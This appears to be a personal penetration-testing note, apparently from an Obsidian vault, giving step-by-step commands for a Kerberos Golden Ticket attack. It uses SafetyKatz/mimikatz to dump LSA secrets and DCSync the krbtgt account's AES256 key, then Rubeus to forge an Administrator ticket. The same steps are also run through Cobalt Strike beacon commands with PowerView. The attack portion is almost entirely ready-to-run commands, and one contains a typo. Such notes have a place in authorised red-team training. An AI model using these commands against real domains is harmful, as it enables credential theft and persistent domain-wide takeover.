Golden Ticket

How to Perform Golden Ticket Attack with SafetyKatz.exe and Rubeus.exe

1. run SafetyKatz.exe '"lsadump::lsa /patch"'
2. run SafetyKatz.exe "ldadump::dcsync /user:dcorp\krbtgt" "exit"
3. run Rubeus.exe golden /aes256:<aes-key> /sid:<sid> /ldap /user:Administrator /printcmd /nowrap

How to Perform Golden Ticket Attack with Rubeus.exe and Cobalt Strike’s mimikatz and execute-assembly beacon commands.

Step One - Get the Domain SID with PowerView.ps1 using powershell-import and powerpick beacon commands

Import PowerView.ps1 using powershell-import beacon command

beacon> powershell-import /home/jorkle/powerview.ps1

Get Domain SID using Powerview (from cobalt strike)

beacon> powerpick Get-DomainSID 

• Make note of this Domain SID value.

Example

Step Two - Obtain krbtgt users aes256 key using mimikatz beacon command

Command

beacon> mimikatz !lsadump::lsa /patch
beacon> mimikatz !lsadump::dcsync /user:north\krbtgt

• Make note of the krbtgt users aes256 key

Example

Step Three - Create Golden Ticket using Rubeus.exe through the execute-assembly beacon command

Command

beacon> execute-assembly /home/jorkle/Rubeus.exe golden /aes256:<krbtgt-aes256-key> /sid:<domain-sid> /ldap /user:Administrator /printcmd /nowrap

Example

Related

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows") OR contains(tags, "active-directory") OR contains(tags, "persistence")
SORT file.ctime DESC

windows

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows")
SORT file.ctime DESC

active-directory

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "active-directory")
SORT file.ctime DESC

persistence

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "persistence")
SORT file.ctime DESC